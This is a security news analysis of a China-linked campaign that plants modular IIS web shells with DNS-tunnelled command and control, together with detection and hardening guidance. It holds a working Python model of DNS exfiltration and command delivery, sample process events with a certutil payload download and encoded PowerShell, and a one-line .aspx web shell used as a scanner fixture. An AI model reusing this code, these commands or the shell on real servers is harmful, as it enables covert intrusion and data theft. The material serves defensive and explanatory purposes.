A newly identified China-linked threat cluster, tracked as OP-512, is actively targeting Microsoft Internet Information Services (IIS) web servers with a custom three-part web shell framework that uses DNS as a covert command-and-control (C2) channel. The campaign, disclosed by ReliaQuest on June 5, 2026, poses a critical risk to Windows Server environments: intrusions have gone roughly 75 days before detection.

OP-512’s methodology represents an evolution in web shell attacks, moving beyond single-file payloads to a modular architecture designed to evade endpoint detection and response (EDR) solutions. The use of DNS tunneling for exfiltration and command delivery further complicates network-based defenses, making this a formidable threat for organizations running public-facing IIS applications.

The Rise of OP-512: A Persistent Threat Actor

ReliaQuest’s investigation links OP-512 to a broader Chinese espionage ecosystem, noting overlaps in tooling and tactics with previously observed state-sponsored groups. The threat cluster focuses on intelligence gathering, primarily targeting sectors that rely on Windows-based web infrastructure. While the full extent of the campaign remains under analysis, initial findings indicate a preference for exploiting known vulnerabilities in IIS and associated components such as ASP.NET and Exchange Server.

The group’s operational security includes the use of compromised legitimate domains and dynamic DNS services to route traffic through a layered proxy network. This infrastructure supports a “low-and-slow” approach, where attackers limit their activity to avoid triggering anomaly-based alerts.

Anatomy of a Three-Part Web Shell Framework

Traditional web shells are single script files—often written in PHP, ASP, or JSP—that provide an attacker with a web-based interface for executing commands, uploading files, and managing the compromised server. OP-512, however, deploys a tri-component framework that separates concerns and makes forensic analysis more difficult.

1. Dropper and Loader

The initial component is a lightweight dropper, typically delivered by exploiting a known, unpatched IIS vulnerability or a vulnerable Exchange Server instance. Its sole purpose is to fetch and assemble the core shell: it pulls encrypted payload fragments out of DNS TXT records and reassembles them on the host. Because this staging traffic is DNS rather than HTTP, it never passes through C2 detection that only inspects web traffic.

2. Core Web Shell Module

Once loaded, the core module exposes a minimal management interface. Where common web shells offer a broad menu of functions, this one is stripped down to the essentials: directory listing, file read/write, process creation, and database access. Its strings and logic are obfuscated with XOR encoding, and it ships as a compiled .NET assembly rather than a readable .aspx script, so signature scans of the web root find no recognizable shell source.

3. DNS Communication Proxy

The third component is a dedicated DNS proxy through which all C2 traffic flows. Outbound data is encoded into the labels of DNS queries sent to attacker-controlled nameservers, and commands come back packed into the TXT or A records of the responses. Egress firewalls almost always permit DNS on port 53, and web application firewalls (WAFs) only ever see HTTP, so the channel passes both untouched. The proxy can also carry the same exchange over DNS over HTTPS (DoH), which hides the queries from internal resolvers and passive DNS monitoring.

DNS Hiding: A Stealthy C2 Channel

DNS tunneling is not new, but OP-512's implementation is unusually careful. Each request uses a different subdomain derived from a time-based seed, so blocklisting observed hostnames does not work; only the parent domain is stable. Payloads are encrypted with a rotating key derived from attributes of the compromised server, so a captured session cannot be decrypted without state recovered from that host.

The shell also has a fallback: if DNS tunneling is disrupted, it switches to HTTPS beaconing against infrastructure presenting certificates that mimic legitimate services. This adaptability shows how much the actor values resilience.
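To make the channel concrete, here is an added, simplified model of a DNS-tunnelled exchange with both sides shown. It is example code written for this article, not OP-512's tooling: the report does not publish the group's domain, bucket interval, label layout or cipher, so the domain, the 10-minute seed rotation, the base32 label packing and the XOR placeholder cipher are all assumptions. The shell side packs output into query names whose leading label changes every time bucket; the nameserver side reassembles the payload and answers with a TXT record carrying the next command.

```python
import base64
import hashlib
import time

# Everything below is constructed for illustration; none of it is from the report.
C2_DOMAIN = "cdn-metrics.example"   # assumption: attacker-controlled zone
TIME_BUCKET_SECONDS = 600           # assumption: seed label rotates every 10 minutes
CHUNK_BYTES = 60                    # 60 bytes -> 96 base32 chars -> two labels
MAX_LABEL = 63                      # RFC 1035 label limit
MAX_NAME = 253                      # practical limit for a full query name


def time_seed(ts: float, bucket: int = TIME_BUCKET_SECONDS) -> str:
    """Label derived from the current time bucket. Every bucket yields a new
    leading label, so a blocklist of observed hostnames is stale within minutes."""
    return hashlib.sha256(str(int(ts) // bucket).encode()).hexdigest()[:8]


def b32(data: bytes) -> str:
    # DNS names are case-insensitive, so tunnels use base32 rather than base64.
    return base64.b32encode(data).decode().rstrip("=").lower()


def unb32(text: str) -> bytes:
    return base64.b32decode(text.upper() + "=" * (-len(text) % 8))


def encode_queries(payload: bytes, session: str, ts: float,
                   domain: str = C2_DOMAIN) -> list[str]:
    """Shell side: split output into query names of the form
    <seed>.<session>.<seq>.<base32 labels>.<domain>."""
    seed = time_seed(ts)
    names = []
    for seq, off in enumerate(range(0, len(payload), CHUNK_BYTES)):
        enc = b32(payload[off:off + CHUNK_BYTES])
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join([seed, session, f"{seq:04x}", *labels, domain])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_queries(names: list[str], domain: str = C2_DOMAIN) -> dict[str, bytes]:
    """Nameserver side: group queries by session, order by sequence number and
    reassemble the payload. The seed label is ignored; it only exists to vary names."""
    sessions: dict[str, dict[int, bytes]] = {}
    suffix = "." + domain
    for name in names:
        if not name.endswith(suffix):
            continue
        _seed, session, seq, *chunks = name[:-len(suffix)].split(".")
        sessions.setdefault(session, {})[int(seq, 16)] = unb32("".join(chunks))
    return {s: b"".join(parts[k] for k in sorted(parts)) for s, parts in sessions.items()}


def txt_response(command: str, key: bytes) -> str:
    """Nameserver side: pack the next command into a TXT record. Repeating-key XOR
    stands in for the undocumented real cipher; it is not secure, only illustrative.
    A TXT string is limited to 255 bytes, so long commands would need splitting."""
    ct = bytes(c ^ key[i % len(key)] for i, c in enumerate(command.encode()))
    return base64.b64encode(ct).decode()


def read_txt_response(txt: str, key: bytes) -> str:
    ct = base64.b64decode(txt)
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(ct)).decode()


def demo(ts: float = 1_700_000_000) -> tuple[bytes, bytes, str, list[str]]:
    # Assumption: the key is derived from a host attribute the shell can recompute.
    key = hashlib.sha256(b"HOSTNAME-placeholder").digest()
    output = b"C:\\inetpub\\wwwroot\\web.config\r\nC:\\inetpub\\wwwroot\\default.aspx\r\n" * 3
    queries = encode_queries(output, session="a1b2c3d4", ts=ts)
    recovered = decode_queries(queries)["a1b2c3d4"]
    command = read_txt_response(txt_response("whoami /all", key), key)
    return output, recovered, command, queries


if __name__ == "__main__":
    output, recovered, command, queries = demo(time.time())
    print(f"{len(output)} bytes of output -> {len(queries)} queries, e.g.\n  {queries[0]}")
    print("nameserver reassembled:", recovered == output, "| shell received:", command)
```

Two defensive points fall out of the model. The per-bucket seed means a hostname blocklist is useless, but the registered domain still repeats in every query, which is what the detection heuristics later in this article key on. And because each query carries at most a few dozen bytes, exfiltrating anything sizeable generates hundreds of long, high-entropy names to a single domain, which is exactly the volume pattern a resolver log makes visible.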

The 75-Day Risk Window

One of the most alarming findings is the campaign's ability to remain undetected for an average of 75 days. ReliaQuest traced the initial compromises to exploitation of vulnerabilities that had been patched months earlier, and found that the attackers selectively reactivate dormant shells to minimize their footprint. The long dwell time leaves room for lateral movement, credential dumping, and sensitive data exfiltration over an extended period.

Windows Server administrators often overlook IIS-specific logging. Requests to a web shell appear only in the IIS W3C logs (by default under %SystemDrive%\inetpub\logs\LogFiles), not in the Windows event logs, so teams that rely on the latter never see them. OP-512 widens this gap by editing IIS logs and clearing PowerShell logs to erase traces of its actions.

Impact on Windows Server Environments

IIS remains a cornerstone of many enterprise infrastructures, hosting everything from internal portals to public-facing web applications. Compromise of an IIS server can provide a foothold into the broader Active Directory environment. From there, attackers can harvest credentials and Kerberos tickets held on the web server, move to domain controllers, and establish persistent access.

OP-512's focus on DNS-based communication is particularly dangerous because most organizations never inspect DNS beyond resolving it. This blind spot lets the web shell operate unimpeded, even in environments with robust perimeter security.

Detection and Mitigation Strategies

Defending against a threat like OP-512 demands a layered approach that goes beyond signature-based antivirus.

Monitor DNS Traffic

Log DNS at the point of resolution (Windows DNS Server analytical logging, or Sysmon Event ID 22 on the hosts themselves) and hunt for anomalous patterns: unusually long query names or TXT answers, high-entropy labels, large numbers of unique subdomains under one registered domain, sustained query volume to a single domain, and lookups of recently registered domains. DNS firewalls (response policy zones) fed by threat intelligence can block known malicious domains. Just as important is egress control: web servers should resolve only through internal resolvers, with direct outbound port 53 and known DoH endpoints blocked, otherwise the tunnel bypasses your logging entirely.

Harden IIS Configuration

  • Apply the latest security patches for IIS, ASP.NET and Exchange Server promptly; the intrusions in this campaign began with vulnerabilities that already had fixes available.
  • Disable IIS modules and ISAPI filters and extensions that the hosted applications do not use, and periodically review the list of native modules registered in applicationHost.config.
  • Run each application pool under its own ApplicationPoolIdentity or a dedicated low-privilege account, never LocalSystem, and deny that identity write access to the web root.
  • Enable W3C logging on every site and forward the logs off-host. IIS records status codes by default but not request bodies; use Failed Request Tracing or a logging module if you need POST contents.

Deploy Endpoint Detection

Employ EDR solutions that can detect in-memory .NET assemblies and suspicious process creation from w3wp.exe (the IIS worker process). Make sure parent/child relationships are actually recorded: enable process creation auditing with command-line logging (Security Event ID 4688) or deploy Sysmon, then alert on unusual children of w3wp.exe such as cmd.exe, powershell.exe, or certutil.exe. Note that w3wp.exe legitimately spawns csc.exe during ASP.NET dynamic compilation, so allowlist that rather than alerting on every child.
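The parent/child rule from the paragraph above, applied to a handful of constructed process-creation events. This is an added example for this article, not detection content from ReliaQuest or any EDR vendor; the events use Sysmon Event ID 1 field names (Image, ParentImage, CommandLine, User) and the timestamps, paths and command lines are made up. The lists of living-off-the-land binaries and of expected w3wp.exe children are assumptions to extend for your estate.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed events. Windows Security Event 4688 carries the same data as
# NewProcessName / ParentProcessName / CommandLine once command-line auditing is on.
SAMPLE_EVENTS = [
    {"UtcTime": "2026-06-01 02:14:07", "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\1a2b3c4d\5e6f7a8b\App_Web_x1y2z3.cmdline"'},
    {"UtcTime": "2026-06-01 02:14:08", "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami /all"},
    {"UtcTime": "2026-06-01 02:14:12", "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"UtcTime": "2026-06-01 02:15:00", "User": r"CORP\jsmith",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe"},
    {"UtcTime": "2026-06-01 02:16:30", "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Windows\Temp\p.txt"},
]

# Assumed lists. LOLBINS: interpreters and download/recon tools a web shell reaches for.
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe",
           "certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "whoami.exe", "net.exe", "net1.exe", "nltest.exe", "ntdsutil.exe"}
# Children w3wp.exe spawns legitimately during ASP.NET dynamic compilation.
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe", "conhost.exe"}
ENCODED_PS = re.compile(r"\s-(encodedcommand|enc|ec|e)\s", re.IGNORECASE)


@dataclass
class Alert:
    severity: str
    reason: str
    event: dict


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[Alert]:
    """Return an Alert for suspicious children of the IIS worker process, else None."""
    if basename(event.get("ParentImage", "")) != "w3wp.exe":
        return None
    child = basename(event.get("Image", ""))
    if child in EXPECTED_CHILDREN:
        return None
    if child in LOLBINS:
        reason = f"w3wp.exe spawned {child}"
        if ENCODED_PS.search(event.get("CommandLine", "") + " "):
            reason += " with an encoded PowerShell command"
        return Alert("high", reason, event)
    # Anything else is still worth a look: web apps rarely need to start processes.
    return Alert("medium", f"w3wp.exe spawned unexpected child {child}", event)


def detect(events: list[dict]) -> list[Alert]:
    return [a for a in (classify(e) for e in events) if a is not None]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.event['UtcTime']} {a.reason}: {a.event['CommandLine'][:80]}")
```

The user field is a useful second signal in production: a child of w3wp.exe running as IIS APPPOOL\... is normal, whereas the same child running as a domain account means either a misconfigured pool identity or an attacker who has already moved past the pool's privileges.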

Review and Isolate

Conduct regular forensic reviews of IIS servers, focusing on the web roots under inetpub, the Temporary ASP.NET Files cache under %windir%\Microsoft.NET\Framework64\v4.0.30319\, and any .aspx, .ashx or .dll files that do not belong to the deployed application or its build. Compare against a known-good deployment manifest where one exists, and do not trust timestamps alone, since attackers can reset them. Network segmentation should isolate web servers from the internal network wherever possible, and egress from the DMZ should be limited to what the application needs.
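A first-pass triage of a web root along those lines, as an added example written for this article (it is not a ReliaQuest tool and has no knowledge of OP-512's actual files). It builds a small constructed web root in a temporary directory, with two legitimate files and two planted ones, then flags scripts that take raw request input and feed it to a process or code-execution primitive, and DLLs that sit outside a bin directory. A recent modification time on its own is deliberately not enough to flag a file. The planted .aspx content, the patterns and the 30-day window are assumptions.

```python
import os
import re
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".dll"}

# Each pattern is weak alone; a shell needs at least two (take input, then execute).
SUSPICIOUS = [
    (re.compile(r"Request\s*(\[|\.(Form|QueryString|Headers|Params|Item))", re.I), "reads raw request input"),
    (re.compile(r"Process\.Start|System\.Diagnostics\.Process|cmd\.exe|powershell", re.I), "starts processes"),
    (re.compile(r"\beval\s*\(|ExecuteGlobal|Assembly\.Load|CreateObject\s*\(", re.I), "dynamic code execution"),
]


@dataclass
class Finding:
    path: str
    reasons: list


def inspect_file(path: Path, root: Path, now: float, recent_days: int) -> Optional[Finding]:
    ext = path.suffix.lower()
    if ext not in WEB_EXTENSIONS:
        return None
    reasons = []
    age_days = (now - path.stat().st_mtime) / 86400
    if age_days <= recent_days:
        # Weak on its own: deployments happen, and attackers can reset timestamps.
        reasons.append(f"modified {age_days:.0f} days ago")
    rel_dirs = {p.lower() for p in path.relative_to(root).parent.parts}
    if ext == ".dll":
        if "bin" not in rel_dirs:
            reasons.append("DLL outside a bin directory")
    else:
        text = path.read_text(errors="ignore")
        hits = [label for rx, label in SUSPICIOUS if rx.search(text)]
        if "reads raw request input" in hits and len(hits) >= 2:
            reasons.append("request-driven execution: " + ", ".join(hits))
    strong = any(r.startswith("request-driven") for r in reasons)
    if strong or len(reasons) >= 2:
        return Finding(str(path), reasons)
    return None


def scan(root: str, recent_days: int = 30, now: Optional[float] = None) -> list[Finding]:
    now = time.time() if now is None else now
    root_path = Path(root)
    findings = []
    for p in sorted(root_path.rglob("*")):
        if p.is_file():
            f = inspect_file(p, root_path, now, recent_days)
            if f is not None:
                findings.append(f)
    return findings


def build_sample_webroot(base: str, now: float) -> str:
    """Constructed web root: default.aspx and bin\\MyApp.dll are legitimate and old;
    sh.aspx and App_Data\\helper.dll are planted and recent."""
    root = Path(base) / "inetpub" / "wwwroot"
    old = now - 400 * 86400
    samples = {
        "default.aspx": ('<%@ Page Language="C#" %>\r\n<html><body>Hello</body></html>', old),
        "bin/MyApp.dll": (b"MZ" + b"\0" * 62, old),
        "aspnet_client/system_web/4_0_30319/sh.aspx": (
            '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>',
            now - 3 * 86400),
        "App_Data/helper.dll": (b"MZ" + b"\0" * 62, now - 5 * 86400),
    }
    for rel, (content, mtime) in samples.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        if isinstance(content, bytes):
            p.write_bytes(content)
        else:
            p.write_text(content)
        os.utime(p, (mtime, mtime))
    return str(root)


def demo() -> list[Finding]:
    now = time.time()
    with tempfile.TemporaryDirectory() as tmp:
        return scan(build_sample_webroot(tmp, now), now=now)


if __name__ == "__main__":
    for f in demo():
        print(f.path, "->", "; ".join(f.reasons))
```

Run against a real server this is a triage aid, not a verdict: compiled shells like the .NET assembly described earlier carry none of the script patterns, which is why the DLL checks and a comparison against the deployed build manifest matter more than content matching for this actor.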

Microsoft’s Security Recommendations

Microsoft has long published guidance for hardening IIS servers, and the wider community has built tooling around it. Key recommendations include:
- Disabling outdated TLS protocols and cipher suites through Schannel settings (the third-party IIS Crypto tool is a common way to apply these safely).
- Enabling Microsoft Defender Antivirus with cloud-delivered protection.
- Implementing AppLocker or Windows Defender Application Control to block untrusted executables.
- Using Attack Surface Analyzer to snapshot the system before and after software installs, so newly opened ports, services, and file permissions are identified.

For organizations using Exchange Server, the urgency is even higher, as OP-512 likely uses known Exchange vulnerabilities for initial access. Microsoft's Exchange Server HealthChecker script (HealthChecker.ps1, published in the CSS-Exchange repository) should be run regularly to confirm patch level and surface known misconfigurations.

Looking Ahead

OP-512 reflects an ongoing shift toward modular, difficult-to-detect web shells that leverage mundane protocols like DNS. As defenders improve their ability to detect HTTP-based shells, threat actors will continue to innovate. The 75-day dwell time suggests that many organizations are still unprepared to spot these intrusions early.

Windows administrators must treat IIS as a critical attack surface and invest in continuous monitoring, regular patching, and advanced threat detection tailored to web server workloads. The ReliaQuest disclosure should serve as a wake-up call to reassess the security posture of all public-facing Windows servers before attackers exploit the next window of opportunity.

For the latest updates on this campaign and indicators of compromise (IOCs), monitor the ReliaQuest threat intelligence portal and Microsoft Security Response Center (MSRC) bulletins.